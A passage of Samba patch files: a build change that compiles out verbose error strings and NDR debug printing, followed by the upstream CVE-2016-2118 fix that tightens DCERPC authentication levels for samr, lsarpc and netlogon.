11 | @@ -2668,6 +2669,7 @@ static const struct werror_code_struct d
12 | { "WERR_AMBIGUOUS_SYSTEM_DEVICE", WERR_AMBIGUOUS_SYSTEM_DEVICE },
13 | { "WERR_SYSTEM_DEVICE_NOT_FOUND", WERR_SYSTEM_DEVICE_NOT_FOUND },
14 | /* END GENERATED-WIN32-ERROR-CODES */
15 | +#endif
16 | { NULL, W_ERROR(0) }
17 | };
18 |
19 | @@ -2684,12 +2686,14 @@ const char *win_errstr(WERROR werror)
20 | static char msg[40];
21 | int idx = 0;
22 |
23 | +#ifdef VERBOSE_ERROR
24 | while (dos_errs[idx].dos_errstr != NULL) {
25 | if (W_ERROR_V(dos_errs[idx].werror) ==
26 | W_ERROR_V(werror))
27 | return dos_errs[idx].dos_errstr;
28 | idx++;
29 | }
30 | +#endif
31 |
32 | slprintf(msg, sizeof(msg), "DOS code 0x%08x", W_ERROR_V(werror));
33 |
34 | @@ -2702,6 +2706,7 @@ struct werror_str_struct {
35 | };
36 |
37 | const struct werror_str_struct dos_err_strs[] = {
38 | +#ifdef VERBOSE_ERROR
39 | { WERR_OK, "Success" },
40 | { WERR_ACCESS_DENIED, "Access is denied" },
41 | { WERR_INVALID_PARAM, "Invalid parameter" },
42 | @@ -5324,6 +5329,7 @@ const struct werror_str_struct dos_err_s
43 | { WERR_AMBIGUOUS_SYSTEM_DEVICE, "The requested system device cannot be identified due to multiple indistinguishable devices potentially matching the identification criteria." },
44 | { WERR_SYSTEM_DEVICE_NOT_FOUND, "The requested system device cannot be found." },
45 | /* END GENERATED-WIN32-ERROR-CODES-DESC */
46 | +#endif
47 | };
48 |
49 |
50 | @@ -5334,6 +5340,7 @@ const struct werror_str_struct dos_err_s
51 |
52 | const char *get_friendly_werror_msg(WERROR werror)
53 | {
54 | +#ifdef VERBOSE_ERROR
55 | int i = 0;
56 |
57 | for (i = 0; i < ARRAY_SIZE(dos_err_strs); i++) {
58 | @@ -5342,6 +5349,7 @@ const char *get_friendly_werror_msg(WERR
59 | return dos_err_strs[i].friendly_errstr;
60 | }
61 | }
62 | +#endif
63 |
64 | return win_errstr(werror);
65 | }
66 | --- a/librpc/ndr/libndr.h
67 | +++ b/librpc/ndr/libndr.h
68 | @@ -663,4 +663,20 @@ _PUBLIC_ enum ndr_err_code ndr_push_enum
69 |
70 | _PUBLIC_ void ndr_print_bool(struct ndr_print *ndr, const char *name, const bool b);
71 |
72 | +#ifndef VERBOSE_ERROR
73 | +#define ndr_print_bool(...) do {} while (0)
74 | +#define ndr_print_struct(...) do {} while (0)
75 | +#define ndr_print_null(...) do {} while (0)
76 | +#define ndr_print_enum(...) do {} while (0)
77 | +#define ndr_print_bitmap_flag(...) do {} while (0)
78 | +#define ndr_print_ptr(...) do {} while (0)
79 | +#define ndr_print_union(...) do {} while (0)
80 | +#define ndr_print_bad_level(...) do {} while (0)
81 | +#define ndr_print_array_uint8(...) do {} while (0)
82 | +#define ndr_print_string_array(...) do {} while (0)
83 | +#define ndr_print_string_array(...) do {} while (0)
84 | +#define ndr_print_NTSTATUS(...) do {} while (0)
85 | +#define ndr_print_WERROR(...) do {} while (0)
86 | +#endif
87 | +
88 | #endif /* __LIBNDR_H__ */
89 | --- a/librpc/ndr/ndr_basic.c
90 | +++ b/librpc/ndr/ndr_basic.c
91 | @@ -31,6 +31,19 @@
92 | #define NDR_SIVAL(ndr, ofs, v) do { if (NDR_BE(ndr)) { RSIVAL(ndr->data,ofs,v); } else SIVAL(ndr->data,ofs,v); } while (0)
93 | #define NDR_SIVALS(ndr, ofs, v) do { if (NDR_BE(ndr)) { RSIVALS(ndr->data,ofs,v); } else SIVALS(ndr->data,ofs,v); } while (0)
94 |
95 | +#undef ndr_print_bool
96 | +#undef ndr_print_struct
97 | +#undef ndr_print_null
98 | +#undef ndr_print_enum
99 | +#undef ndr_print_bitmap_flag
100 | +#undef ndr_print_ptr
101 | +#undef ndr_print_union
102 | +#undef ndr_print_bad_level
103 | +#undef ndr_print_array_uint8
104 | +#undef ndr_print_string_array
105 | +#undef ndr_print_string_array
106 | +#undef ndr_print_NTSTATUS
107 | +#undef ndr_print_WERROR
108 |
109 | /*
110 | check for data leaks from the server by looking for non-zero pad bytes
111 | --- a/librpc/ndr/ndr_string.c
112 | +++ b/librpc/ndr/ndr_string.c
113 | @@ -588,6 +588,7 @@ _PUBLIC_ enum ndr_err_code ndr_push_stri
114 | return NDR_ERR_SUCCESS;
115 | }
116 |
117 | +#undef ndr_print_string_array
118 | _PUBLIC_ void ndr_print_string_array(struct ndr_print *ndr, const char *name, const char **a)
119 | {
120 | uint32_t count;
121 | --- a/librpc/rpc/dcerpc_error.c
122 | +++ b/librpc/rpc/dcerpc_error.c
123 | @@ -31,6 +31,7 @@ struct dcerpc_fault_table {
124 | static const struct dcerpc_fault_table dcerpc_faults[] =
125 | {
126 | #define _FAULT_STR(x) { #x , x }
127 | +#ifdef VERBOSE_ERROR
128 | _FAULT_STR(DCERPC_NCA_S_COMM_FAILURE),
129 | _FAULT_STR(DCERPC_NCA_S_OP_RNG_ERROR),
130 | _FAULT_STR(DCERPC_NCA_S_UNKNOWN_IF),
131 | @@ -78,6 +79,7 @@ static const struct dcerpc_fault_table d
132 | _FAULT_STR(DCERPC_NCA_S_FAULT_CODESET_CONV_ERROR),
133 | _FAULT_STR(DCERPC_NCA_S_FAULT_OBJECT_NOT_FOUND),
134 | _FAULT_STR(DCERPC_NCA_S_FAULT_NO_CLIENT_STUB),
135 | +#endif
136 | { NULL, 0 }
137 | #undef _FAULT_STR
138 | };
139 | @@ -87,12 +89,14 @@ _PUBLIC_ const char *dcerpc_errstr(TALLO
140 | int idx = 0;
141 | WERROR werr = W_ERROR(fault_code);
142 |
143 | +#ifdef VERBOSE_ERROR
144 | while (dcerpc_faults[idx].errstr != NULL) {
145 | if (dcerpc_faults[idx].faultcode == fault_code) {
146 | return dcerpc_faults[idx].errstr;
147 | }
148 | idx++;
149 | }
150 | +#endif
151 |
152 | return win_errstr(werr);
153 | }
154 | --- a/source3/libsmb/nterr.c
155 | +++ b/source3/libsmb/nterr.c
156 | @@ -702,6 +702,7 @@ const char *nt_errstr(NTSTATUS nt_code)
157 | NT_STATUS_DOS_CODE(nt_code));
158 | }
159 |
160 | +#ifdef VERBOSE_ERROR
161 | while (nt_errs[idx].nt_errstr != NULL) {
162 | if (NT_STATUS_V(nt_errs[idx].nt_errcode) ==
163 | NT_STATUS_V(nt_code)) {
164 | @@ -709,6 +710,7 @@ const char *nt_errstr(NTSTATUS nt_code)
165 | }
166 | idx++;
167 | }
168 | +#endif
169 |
170 | result = talloc_asprintf(talloc_tos(), "NT code 0x%08x",
171 | NT_STATUS_V(nt_code));
172 | @@ -724,12 +726,14 @@ const char *get_friendly_nt_error_msg(NT
173 | {
174 | int idx = 0;
175 |
176 | +#ifdef VERBOSE_ERROR
177 | while (nt_err_desc[idx].nt_errstr != NULL) {
178 | if (NT_STATUS_V(nt_err_desc[idx].nt_errcode) == NT_STATUS_V(nt_code)) {
179 | return nt_err_desc[idx].nt_errstr;
180 | }
181 | idx++;
182 | }
183 | +#endif
184 |
185 | /* fall back to NT_STATUS_XXX string */
186 |
187 | @@ -745,6 +749,7 @@ const char *get_nt_error_c_code(NTSTATUS
188 | char *result;
189 | int idx = 0;
190 |
191 | +#ifdef VERBOSE_ERROR
192 | while (nt_errs[idx].nt_errstr != NULL) {
193 | if (NT_STATUS_V(nt_errs[idx].nt_errcode) ==
194 | NT_STATUS_V(nt_code)) {
195 | @@ -752,6 +757,7 @@ const char *get_nt_error_c_code(NTSTATUS
196 | }
197 | idx++;
198 | }
199 | +#endif
200 |
201 | result = talloc_asprintf(talloc_tos(), "NT_STATUS(0x%08x)",
202 | NT_STATUS_V(nt_code));
203 | @@ -767,12 +773,14 @@ NTSTATUS nt_status_string_to_code(const
204 | {
205 | int idx = 0;
206 |
207 | +#ifdef VERBOSE_ERROR
208 | while (nt_errs[idx].nt_errstr != NULL) {
209 | if (strcasecmp(nt_errs[idx].nt_errstr, nt_status_str) == 0) {
210 | return nt_errs[idx].nt_errcode;
211 | }
212 | idx++;
213 | }
214 | +#endif
215 | return NT_STATUS_UNSUCCESSFUL;
216 | }
217 |
218 | --- a/lib/tdb/common/tdb_private.h
219 | +++ b/lib/tdb/common/tdb_private.h
220 | @@ -69,7 +69,11 @@ typedef uint32_t tdb_off_t;
221 | /* NB assumes there is a local variable called "tdb" that is the
222 | * current context, also takes doubly-parenthesized print-style
223 | * argument. */
224 | +#ifdef VERBOSE_DEBUG
225 | #define TDB_LOG(x) tdb->log.log_fn x
226 | +#else
227 | +#define TDB_LOG(x) do {} while(0)
228 | +#endif
229 |
230 | #ifdef TDB_TRACE
231 | void tdb_trace(struct tdb_context *tdb, const char *op);
232 | --- a/source3/script/mkbuildoptions.awk
233 | +++ b/source3/script/mkbuildoptions.awk
234 | @@ -55,7 +55,7 @@ BEGIN {
235 | print "****************************************************************************/";
236 | print "void build_options(bool screen)";
237 | print "{";
238 | - print " if ((DEBUGLEVEL < 4) && (!screen)) {";
239 | + print " if ((DEBUGLEVEL < 4) || (!screen)) {";
240 | print " return;";
241 | print " }";
242 | print "";
243 | --- a/source3/script/mkbuildoptions-waf.awk
244 | +++ b/source3/script/mkbuildoptions-waf.awk
245 | @@ -55,7 +55,7 @@ BEGIN {
246 | print "****************************************************************************/";
247 | print "void build_options(bool screen)";
248 | print "{";
249 | - print " if ((DEBUGLEVEL < 4) && (!screen)) {";
250 | + print " if ((DEBUGLEVEL < 4) || (!screen)) {";
251 | print " return;";
252 | print " }";
253 | print "";
254 | --- a/source3/rpc_client/cli_pipe.c
255 | +++ b/source3/rpc_client/cli_pipe.c
256 | @@ -445,7 +445,6 @@ static NTSTATUS cli_pipe_validate_curren
257 | rpccli_pipe_txt(talloc_tos(), cli),
258 | pkt->ptype, expected_pkt_type,
259 | nt_errstr(ret)));
260 | - NDR_PRINT_DEBUG(ncacn_packet, pkt);
261 | return ret;
262 | }
263 |
264 | @@ -466,7 +465,6 @@ static NTSTATUS cli_pipe_validate_curren
265 | rpccli_pipe_txt(talloc_tos(), cli),
266 | pkt->ptype, expected_pkt_type,
267 | nt_errstr(ret)));
268 | - NDR_PRINT_DEBUG(ncacn_packet, pkt);
269 | return ret;
270 | }
271 |
272 | @@ -486,7 +484,6 @@ static NTSTATUS cli_pipe_validate_curren
273 | rpccli_pipe_txt(talloc_tos(), cli),
274 | pkt->ptype, expected_pkt_type,
275 | nt_errstr(ret)));
276 | - NDR_PRINT_DEBUG(ncacn_packet, pkt);
277 | return ret;
278 | }
279 |
280 | @@ -508,7 +505,6 @@ static NTSTATUS cli_pipe_validate_curren
281 | rpccli_pipe_txt(talloc_tos(), cli),
282 | pkt->ptype, expected_pkt_type,
283 | nt_errstr(ret)));
284 | - NDR_PRINT_DEBUG(ncacn_packet, pkt);
285 | return ret;
286 | }
287 |
288 | @@ -526,7 +522,6 @@ static NTSTATUS cli_pipe_validate_curren
289 | rpccli_pipe_txt(talloc_tos(), cli),
290 | pkt->ptype, expected_pkt_type,
291 | nt_errstr(ret)));
292 | - NDR_PRINT_DEBUG(ncacn_packet, pkt);
293 | return ret;
294 | }
295 |
296 | @@ -570,7 +565,6 @@ static NTSTATUS cli_pipe_validate_curren
297 | rpccli_pipe_txt(talloc_tos(), cli),
298 | pkt->ptype, expected_pkt_type,
299 | nt_errstr(ret)));
300 | - NDR_PRINT_DEBUG(ncacn_packet, pkt);
301 | return ret;
302 | }
303 |
304 | --- a/source3/rpc_server/srv_pipe.c
305 | +++ b/source3/rpc_server/srv_pipe.c
306 | @@ -996,7 +996,6 @@ static bool api_pipe_bind_req(struct pip
307 | if (!NT_STATUS_IS_OK(status)) {
308 | DEBUG(1, ("api_pipe_bind_req: invalid pdu: %s\n",
309 | nt_errstr(status)));
310 | - NDR_PRINT_DEBUG(ncacn_packet, pkt);
311 | goto err_exit;
312 | }
313 |
314 | @@ -1330,7 +1329,6 @@ bool api_pipe_bind_auth3(struct pipes_st
315 | if (!NT_STATUS_IS_OK(status)) {
316 | DEBUG(1, ("api_pipe_bind_auth3: invalid pdu: %s\n",
317 | nt_errstr(status)));
318 | - NDR_PRINT_DEBUG(ncacn_packet, pkt);
319 | goto err;
320 | }
321 |
322 | @@ -1488,7 +1486,6 @@ static bool api_pipe_alter_context(struc
323 | if (!NT_STATUS_IS_OK(status)) {
324 | DEBUG(1, ("api_pipe_alter_context: invalid pdu: %s\n",
325 | nt_errstr(status)));
326 | - NDR_PRINT_DEBUG(ncacn_packet, pkt);
327 | goto err_exit;
328 | }
329 |
330 | @@ -2062,7 +2059,6 @@ static bool process_request_pdu(struct p
331 | if (!NT_STATUS_IS_OK(status)) {
332 | DEBUG(1, ("process_request_pdu: invalid pdu: %s\n",
333 | nt_errstr(status)));
334 | - NDR_PRINT_DEBUG(ncacn_packet, pkt);
335 | set_incoming_fault(p);
336 | return false;
337 | }
338 |
--------------------------------------------------------------------------------
/samba-patches/027-CVE-2016-2118-v3-6.patch:
--------------------------------------------------------------------------------
1 | From d68424b5ef92f5810760f90e9eeb664572a61e4e Mon Sep 17 00:00:00 2001
2 | From: Stefan Metzmacher
3 | Date: Tue, 15 Dec 2015 14:49:36 +0100
4 | Subject: [PATCH 01/10] CVE-2016-2118: s3: rpcclient: change the default auth
5 | level from DCERPC_AUTH_LEVEL_CONNECT to DCERPC_AUTH_LEVEL_INTEGRITY
6 |
7 | ncacn_ip_tcp:server should get the same protection as ncacn_np:server
8 | if authentication and smb signing is used.
9 |
10 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=11616
11 |
12 | Signed-off-by: Stefan Metzmacher
13 |
14 | (cherry picked from commit dab41dee8a4fb27dbf3913b0e44a4cc726e3ac98)
15 | ---
16 | source3/rpcclient/rpcclient.c | 5 ++---
17 | 1 file changed, 2 insertions(+), 3 deletions(-)
18 |
19 | --- a/source3/rpcclient/rpcclient.c
20 | +++ b/source3/rpcclient/rpcclient.c
21 | @@ -1062,10 +1062,9 @@ out_free:
22 | }
23 | }
24 | if (pipe_default_auth_type != DCERPC_AUTH_TYPE_NONE) {
25 | - /* If neither Integrity or Privacy are requested then
26 | - * Use just Connect level */
27 | + /* If nothing is requested then default to integrity */
28 | if (pipe_default_auth_level == DCERPC_AUTH_LEVEL_NONE) {
29 | - pipe_default_auth_level = DCERPC_AUTH_LEVEL_CONNECT;
30 | + pipe_default_auth_level = DCERPC_AUTH_LEVEL_INTEGRITY;
31 | }
32 | }
33 |
34 | --- a/source4/librpc/rpc/dcerpc_util.c
35 | +++ b/source4/librpc/rpc/dcerpc_util.c
36 | @@ -593,15 +593,15 @@ struct composite_context *dcerpc_pipe_au
37 |
38 | /* Perform an authenticated DCE-RPC bind
39 | */
40 | - if (!(conn->flags & (DCERPC_SIGN|DCERPC_SEAL))) {
41 | + if (!(conn->flags & (DCERPC_CONNECT|DCERPC_SEAL))) {
42 | /*
43 | we are doing an authenticated connection,
44 | - but not using sign or seal. We must force
45 | - the CONNECT dcerpc auth type as a NONE auth
46 | - type doesn't allow authentication
47 | - information to be passed.
48 | + which needs to use [connect], [sign] or [seal].
49 | + If nothing is specified, we default to [sign] now.
50 | + This give roughly the same protection as
51 | + ncacn_np with smb signing.
52 | */
53 | - conn->flags |= DCERPC_CONNECT;
54 | + conn->flags |= DCERPC_SIGN;
55 | }
56 |
57 | if (s->binding->flags & DCERPC_AUTH_SPNEGO) {
58 | --- /dev/null
59 | +++ b/docs-xml/smbdotconf/security/allowdcerpcauthlevelconnect.xml
60 | @@ -0,0 +1,22 @@
61 | +
65 | +
66 | + This option controls whether DCERPC services are allowed to
67 | + be used with DCERPC_AUTH_LEVEL_CONNECT, which provides authentication,
68 | + but no per message integrity nor privacy protection.
69 | +
70 | + The behavior can be controlled per interface name (e.g. lsarpc, netlogon, samr, srvsvc,
71 | + winreg, wkssvc ...) by using 'allow dcerpc auth level connect:interface = no' as option.
72 | +
73 | + This option yields precedence to the implentation specific restrictions.
74 | + E.g. the drsuapi and backupkey protocols require DCERPC_AUTH_LEVEL_PRIVACY.
75 | + While others like samr and lsarpc have a hardcoded default of no.
76 | +
77 | +
78 | +
79 | +no
80 | +yes
81 | +
82 | +
83 | --- a/source3/include/proto.h
84 | +++ b/source3/include/proto.h
85 | @@ -1821,6 +1821,7 @@ char* lp_perfcount_module(void);
86 | void lp_set_passdb_backend(const char *backend);
87 | void widelinks_warning(int snum);
88 | char *lp_ncalrpc_dir(void);
89 | +bool lp_allow_dcerpc_auth_level_connect(void);
90 |
91 | /* The following definitions come from param/loadparm_server_role.c */
92 |
93 | --- a/source3/param/loadparm.c
94 | +++ b/source3/param/loadparm.c
95 | @@ -355,6 +355,7 @@ struct global {
96 | bool bUseMmap;
97 | bool bHostnameLookups;
98 | bool bUnixExtensions;
99 | + bool bAllowDcerpcAuthLevelConnect;
100 | bool bDisableNetbios;
101 | char * szDedicatedKeytabFile;
102 | int iKerberosMethod;
103 | @@ -2303,6 +2304,15 @@ static struct parm_struct parm_table[] =
104 | .flags = FLAG_ADVANCED,
105 | },
106 | {
107 | + .label = "allow dcerpc auth level connect",
108 | + .type = P_BOOL,
109 | + .p_class = P_GLOBAL,
110 | + .ptr = &Globals.bAllowDcerpcAuthLevelConnect,
111 | + .special = NULL,
112 | + .enum_list = NULL,
113 | + .flags = FLAG_ADVANCED,
114 | + },
115 | + {
116 | .label = "use spnego",
117 | .type = P_BOOL,
118 | .p_class = P_GLOBAL,
119 | @@ -5371,6 +5381,8 @@ static void init_globals(bool reinit_glo
120 | Globals.bClientNTLMv2Auth = True; /* Client should always use use NTLMv2, as we can't tell that the server supports it, but most modern servers do */
121 | /* Note, that we will also use NTLM2 session security (which is different), if it is available */
122 |
123 | + Globals.bAllowDcerpcAuthLevelConnect = false; /* we don't allow this by default */
124 | +
125 | Globals.map_to_guest = 0; /* By Default, "Never" */
126 | Globals.oplock_break_wait_time = 0; /* By Default, 0 msecs. */
127 | Globals.enhanced_browsing = true;
128 | @@ -5745,6 +5757,7 @@ FN_GLOBAL_INTEGER(lp_username_map_cache_
129 |
130 | FN_GLOBAL_STRING(lp_check_password_script, &Globals.szCheckPasswordScript)
131 |
132 | +FN_GLOBAL_BOOL(lp_allow_dcerpc_auth_level_connect, &Globals.bAllowDcerpcAuthLevelConnect)
133 | FN_GLOBAL_STRING(lp_wins_hook, &Globals.szWINSHook)
134 | FN_GLOBAL_CONST_STRING(lp_template_homedir, &Globals.szTemplateHomedir)
135 | FN_GLOBAL_CONST_STRING(lp_template_shell, &Globals.szTemplateShell)
136 | --- a/source3/include/ntdomain.h
137 | +++ b/source3/include/ntdomain.h
138 | @@ -89,6 +89,10 @@ typedef struct pipe_rpc_fns {
139 | uint32 context_id;
140 | struct ndr_syntax_id syntax;
141 |
142 | + /*
143 | + * shall we allow "connect" auth level for this interface ?
144 | + */
145 | + bool allow_connect;
146 | } PIPE_RPC_FNS;
147 |
148 | /*
149 | --- a/source3/rpc_server/srv_pipe.c
150 | +++ b/source3/rpc_server/srv_pipe.c
151 | @@ -44,6 +44,11 @@
152 | #include "rpc_server/srv_pipe.h"
153 | #include "../librpc/gen_ndr/ndr_dcerpc.h"
154 | #include "../librpc/ndr/ndr_dcerpc.h"
155 | +#include "../librpc/gen_ndr/ndr_samr.h"
156 | +#include "../librpc/gen_ndr/ndr_lsa.h"
157 | +#include "../librpc/gen_ndr/ndr_netlogon.h"
158 | +#include "../librpc/gen_ndr/ndr_epmapper.h"
159 | +#include "../librpc/gen_ndr/ndr_echo.h"
160 |
161 | #undef DBGC_CLASS
162 | #define DBGC_CLASS DBGC_RPC_SRV
163 | @@ -340,6 +345,8 @@ static bool check_bind_req(struct pipes_
164 | uint32 context_id)
165 | {
166 | struct pipe_rpc_fns *context_fns;
167 | + const char *interface_name = NULL;
168 | + bool ok;
169 |
170 | DEBUG(3,("check_bind_req for %s\n",
171 | get_pipe_name_from_syntax(talloc_tos(), abstract)));
172 | @@ -390,12 +397,57 @@ static bool check_bind_req(struct pipes_
173 | return False;
174 | }
175 |
176 | + interface_name = get_pipe_name_from_syntax(talloc_tos(),
177 | + abstract);
178 | +
179 | + SMB_ASSERT(interface_name != NULL);
180 | +
181 | context_fns->next = context_fns->prev = NULL;
182 | context_fns->n_cmds = rpc_srv_get_pipe_num_cmds(abstract);
183 | context_fns->cmds = rpc_srv_get_pipe_cmds(abstract);
184 | context_fns->context_id = context_id;
185 | context_fns->syntax = *abstract;
186 |
187 | + context_fns->allow_connect = lp_allow_dcerpc_auth_level_connect();
188 | + /*
189 | + * for the samr and the lsarpc interfaces we don't allow "connect"
190 | + * auth_level by default.
191 | + */
192 | + ok = ndr_syntax_id_equal(abstract, &ndr_table_samr.syntax_id);
193 | + if (ok) {
194 | + context_fns->allow_connect = false;
195 | + }
196 | + ok = ndr_syntax_id_equal(abstract, &ndr_table_lsarpc.syntax_id);
197 | + if (ok) {
198 | + context_fns->allow_connect = false;
199 | + }
200 | + ok = ndr_syntax_id_equal(abstract, &ndr_table_netlogon.syntax_id);
201 | + if (ok) {
202 | + context_fns->allow_connect = false;
203 | + }
204 | + /*
205 | + * for the epmapper and echo interfaces we allow "connect"
206 | + * auth_level by default.
207 | + */
208 | + ok = ndr_syntax_id_equal(abstract, &ndr_table_epmapper.syntax_id);
209 | + if (ok) {
210 | + context_fns->allow_connect = true;
211 | + }
212 | + ok = ndr_syntax_id_equal(abstract, &ndr_table_rpcecho.syntax_id);
213 | + if (ok) {
214 | + context_fns->allow_connect = true;
215 | + }
216 | + /*
217 | + * every interface can be modified to allow "connect" auth_level by
218 | + * using a parametric option like:
219 | + * allow dcerpc auth level connect:
220 | + * e.g.
221 | + * allow dcerpc auth level connect:samr = yes
222 | + */
223 | + context_fns->allow_connect = lp_parm_bool(-1,
224 | + "allow dcerpc auth level connect",
225 | + interface_name, context_fns->allow_connect);
226 | +
227 | /* add to the list of open contexts */
228 |
229 | DLIST_ADD( p->contexts, context_fns );
230 | @@ -1736,6 +1788,7 @@ static bool api_pipe_request(struct pipe
231 | TALLOC_CTX *frame = talloc_stackframe();
232 | bool ret = False;
233 | PIPE_RPC_FNS *pipe_fns;
234 | + const char *interface_name = NULL;
235 |
236 | if (!p->pipe_bound) {
237 | DEBUG(1, ("Pipe not bound!\n"));
238 | @@ -1757,8 +1810,36 @@ static bool api_pipe_request(struct pipe
239 | return false;
240 | }
241 |
242 | + interface_name = get_pipe_name_from_syntax(talloc_tos(),
243 | + &pipe_fns->syntax);
244 | +
245 | + SMB_ASSERT(interface_name != NULL);
246 | +
247 | DEBUG(5, ("Requested \\PIPE\\%s\n",
248 | - get_pipe_name_from_syntax(talloc_tos(), &pipe_fns->syntax)));
249 | + interface_name));
250 | +
251 | + switch (p->auth.auth_level) {
252 | + case DCERPC_AUTH_LEVEL_NONE:
253 | + case DCERPC_AUTH_LEVEL_INTEGRITY:
254 | + case DCERPC_AUTH_LEVEL_PRIVACY:
255 | + break;
256 | + default:
257 | + if (!pipe_fns->allow_connect) {
258 | + DEBUG(1, ("%s: restrict auth_level_connect access "
259 | + "to [%s] with auth[type=0x%x,level=0x%x] "
260 | + "on [%s] from [%s]\n",
261 | + __func__, interface_name,
262 | + p->auth.auth_type,
263 | + p->auth.auth_level,
264 | + derpc_transport_string_by_transport(p->transport),
265 | + p->client_id->name));
266 | +
267 | + setup_fault_pdu(p, NT_STATUS(DCERPC_FAULT_ACCESS_DENIED));
268 | + TALLOC_FREE(frame);
269 | + return true;
270 | + }
271 | + break;
272 | + }
273 |
274 | if (!srv_pipe_check_verification_trailer(p, pkt, pipe_fns)) {
275 | DEBUG(1, ("srv_pipe_check_verification_trailer: failed\n"));
276 | --- a/source3/selftest/knownfail
277 | +++ b/source3/selftest/knownfail
278 | @@ -18,3 +18,5 @@ samba3.posix_s3.nbt.dgram.*netlogon2
279 | samba3.*rap.sam.*.useradd # Not provided by Samba 3
280 | samba3.*rap.sam.*.userdelete # Not provided by Samba 3
281 | samba3.*rap.basic.*.netsessiongetinfo # Not provided by Samba 3
282 | +samba3.blackbox.rpcclient.over.ncacn_np.with.*connect.* # we don't allow auth_level_connect anymore
283 | +samba3.posix_s3.rpc.lsa.lookupsids.*ncacn_ip_tcp.*connect.* # we don't allow auth_level_connect anymore
284 | --- a/source3/selftest/tests.py
285 | +++ b/source3/selftest/tests.py
286 | @@ -201,6 +201,8 @@ if sub.returncode == 0:
287 | plansmbtorturetestsuite(t, "s3dc", '//$SERVER_IP/tmpguest -U$USERNAME%$PASSWORD')
288 | elif t == "raw.samba3posixtimedlock":
289 | plansmbtorturetestsuite(t, "s3dc", '//$SERVER_IP/tmpguest -U$USERNAME%$PASSWORD --option=torture:localdir=$SELFTEST_PREFIX/dc/share')
290 | + elif t == "rpc.samr.passwords.validate":
291 | + plansmbtorturetestsuite(t, "s3dc", 'ncacn_np:$SERVER_IP[seal] -U$USERNAME%$PASSWORD', 'over ncacn_np ')
292 | else:
293 | plansmbtorturetestsuite(t, "s3dc", '//$SERVER_IP/tmp -U$USERNAME%$PASSWORD')
294 |
295 | --- a/source3/rpc_server/samr/srv_samr_nt.c
296 | +++ b/source3/rpc_server/samr/srv_samr_nt.c
297 | @@ -6628,6 +6628,11 @@ NTSTATUS _samr_ValidatePassword(struct p
298 | struct samr_GetDomPwInfo pw;
299 | struct samr_PwInfo dom_pw_info;
300 |
301 | + if (p->auth.auth_level != DCERPC_AUTH_LEVEL_PRIVACY) {
302 | + p->fault_state = DCERPC_FAULT_ACCESS_DENIED;
303 | + return NT_STATUS_ACCESS_DENIED;
304 | + }
305 | +
306 | if (r->in.level < 1 || r->in.level > 3) {
307 | return NT_STATUS_INVALID_INFO_CLASS;
308 | }
309 |
--------------------------------------------------------------------------------